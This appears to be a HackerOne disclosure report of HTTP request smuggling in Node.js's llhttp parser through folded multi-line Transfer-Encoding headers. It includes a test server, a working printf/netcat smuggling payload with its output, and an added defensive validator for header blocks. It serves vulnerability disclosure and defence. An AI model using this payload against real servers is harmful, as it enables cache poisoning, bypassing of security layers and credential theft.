hackerone / shacharm / H1:1665156

Node.js: HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding (improper fix for CVE-2022-32215)

2022-08-10 08:50:02
shacharm
hackerone.com

CVSS3: 6.5 Medium (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: LOW
  Integrity Impact: LOW
  Availability Impact: NONE

CVSS2: 6.4 Medium (AV:N/AC:L/Au:N/C:P/I:P/A:N)
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: NONE

EPSS: 0.005 Low (Percentile 73.5%)

Summary:
Due to an incomplete fix for CVE-2022-32215, the llhttp parser in the http module in Node v16.16.0 and 18.7.0 still does not correctly handle multi-line Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS).

Description:

We have identified that the root issue of CVE-2022-32215 (that was reported here) was seemingly not fixed at all. Running the same exploit produces the same unwanted result. For the sake of brevity, I won't repeat the description; it can be seen in the original issue.

Steps To Reproduce:

The reproduction steps are the same as in the original issue.

Testing Server

Run the following server (node server.js):

const http = require('http');

http.createServer((request, response) => {
  let body = [];
  request.on('error', (err) => {
    response.end("error while reading body: " + err);
  }).on('data', (chunk) => {
    body.push(chunk);
  }).on('end', () => {
    body = Buffer.concat(body).toString();

    response.on('error', (err) => {
      response.end("error while sending response: " + err);
    });

    // Echo the parsed headers and body back, so the framing decision
    // made by the HTTP parser is visible in the response.
    response.end(JSON.stringify({
      "Headers": request.headers,
      "Length": body.length,
      "Body": body,
    }) + "\n");
  });
}).listen(80);

Payload

printf "POST / HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"Transfer-Encoding: chunked\r\n"\
" , chunked-false\r\n"\
"\r\n"\
"1\r\n"\
"A\r\n"\
"0\r\n"\
"\r\n"\
"GET /flag HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"foo: x\r\n"\
"\r\n"\
"\r\n" | nc localhost 80

Output

HTTP/1.1 200 OK
Date: Sun, 06 Mar 2022 03:34:05 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 101

{"Headers":{"transfer-encoding":"chunked , chunked-false"},"Length":1,"Body":"A"}
HTTP/1.1 200 OK
Date: Sun, 06 Mar 2022 03:34:05 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 64

{"Headers":{"host":"127.0.0.1", "foo":"x"},"Length":0,"Body":""}

As you can see, the payload was parsed as two requests (a POST to / and a GET to /flag), which is erroneous behavior: the first request was accepted as a chunked request even though its folded Transfer-Encoding value is "chunked , chunked-false", so it should have been rejected.

The expected output should be:

HTTP/1.1 400 Bad Request
Connection: close
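As an added example (not code from this report or from Node.js/llhttp), the following check makes explicit the framing rule the report expects the parser to enforce: a request whose Transfer-Encoding header is continued with an obs-fold line, or whose final transfer-coding is not chunked, must be answered with 400 Bad Request rather than framed as a chunked body. It can serve as a regression check in a test suite, or as a pre-filter in front of an application server. The function and sample names are assumptions of this example; the samples are constructed from the header block of the payload shown above and from a well-formed chunked request.

```javascript
'use strict';

// Added example, not part of the HackerOne report or of Node.js/llhttp.
// Strict HTTP/1.1 header-block check modelled on RFC 7230: obs-fold
// continuation lines (section 3.2.4) are refused, and a Transfer-Encoding
// whose final coding is not "chunked" (section 3.3.3) leaves the message
// length undetermined, so the request is refused instead of being framed.

const TOKEN = /^[!#$%&'*+.^_`|~0-9a-z-]+$/; // RFC 7230 tchar, lower-cased

// Returns null when the header block is acceptable, otherwise a string
// naming the first defect found (the caller answers 400 and closes).
function checkHeaderBlock(raw) {
  const end = raw.indexOf('\r\n\r\n');
  if (end === -1) return 'incomplete header block';
  const lines = raw.slice(0, end).split('\r\n');
  const requestLine = lines.shift();
  if (!/^[A-Z]+ \S+ HTTP\/1\.[01]$/.test(requestLine)) return 'malformed request line';

  const headers = [];
  for (const line of lines) {
    // A line starting with SP or HTAB is an obs-fold continuation of the
    // previous field; the report's payload uses one to append ", chunked-false".
    if (line.startsWith(' ') || line.startsWith('\t')) {
      return 'obs-fold continuation line rejected: ' + JSON.stringify(line);
    }
    const colon = line.indexOf(':');
    // Field-name must be a non-empty token with no whitespace before the colon.
    if (colon <= 0 || !TOKEN.test(line.slice(0, colon).toLowerCase())) {
      return 'malformed header line: ' + JSON.stringify(line);
    }
    headers.push({ name: line.slice(0, colon).toLowerCase(), value: line.slice(colon + 1).trim() });
  }

  const te = headers.filter((h) => h.name === 'transfer-encoding');
  const cl = headers.filter((h) => h.name === 'content-length');
  if (te.length && cl.length) return 'both Transfer-Encoding and Content-Length present';
  if (te.length) {
    // Transfer-Encoding is list-valued: merge all occurrences, then require
    // every element to be a token and "chunked" to be the final coding.
    const codings = te.flatMap((h) => h.value.split(',')).map((c) => c.trim().toLowerCase());
    const bad = codings.find((c) => !TOKEN.test(c));
    if (bad !== undefined) return 'invalid transfer-coding token: ' + JSON.stringify(bad);
    if (codings[codings.length - 1] !== 'chunked') return 'final transfer-coding is not chunked';
    if (codings.filter((c) => c === 'chunked').length > 1) return 'chunked applied more than once';
  }
  return null;
}

// Constructed samples. FOLDED_TE is the header block of the report's payload;
// CLEAN_CHUNKED is the same request without the folded continuation line;
// TE_NOT_LAST shows the general rule of section 3.3.3 beyond the folding case.
const FOLDED_TE = 'POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nTransfer-Encoding: chunked\r\n , chunked-false\r\n\r\n1\r\nA\r\n0\r\n\r\n';
const CLEAN_CHUNKED = 'POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nA\r\n0\r\n\r\n';
const TE_NOT_LAST = 'POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nTransfer-Encoding: chunked, gzip\r\n\r\n';

for (const [name, raw] of Object.entries({ FOLDED_TE, CLEAN_CHUNKED, TE_NOT_LAST })) {
  const defect = checkHeaderBlock(raw);
  console.log(name + ': ' + (defect === null ? 'accept' : '400 Bad Request (' + defect + ')'));
}
```

Because the check works on the raw header block, it can be run over captured traffic or used as the first step of a regression test against a patched server: a folded Transfer-Encoding header must never reach the application parser, and a rejected request should be answered with 400 and the connection closed, which is exactly the expected output given above.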

Supporting Material/References:

Exploitation of the issue on Node 16.16.0 -
{F1861233}

Credit

The vulnerability was discovered by Liav Gutman of the JFrog CSO Team

Impact

Depending on the specific web application, HRS can lead to cache poisoning, bypassing of security layers, stealing of credentials and so on.
